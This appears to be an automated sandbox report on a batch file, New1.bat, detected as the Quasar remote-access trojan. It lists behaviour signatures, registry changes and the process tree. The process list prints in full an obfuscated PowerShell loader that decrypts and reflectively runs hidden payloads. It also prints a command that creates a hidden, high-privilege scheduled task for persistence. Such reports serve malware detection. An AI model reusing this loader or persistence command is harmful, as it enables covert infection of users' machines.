Analysis Overview
SHA256
3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308
Threat Level: Known bad
The file New1.bat was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Suspicious use of NtCreateUserProcessOtherParentProcess
Quasar payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks BIOS information in registry
Checks computer location settings
Executes dropped EXE
Looks up external IP address via web service
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates physical storage devices
Checks processor information in registry
Creates scheduled task(s)
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-28 13:42
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-28 13:42
Reported
2024-05-28 13:47
Platform
win11-20240426-en
Max time kernel
300s
Max time network
293s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1916 created 640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1916 set thread context of 1864 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New1.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\New1.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\New1.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_301_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_301.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_301.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_301.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_301.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_301.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
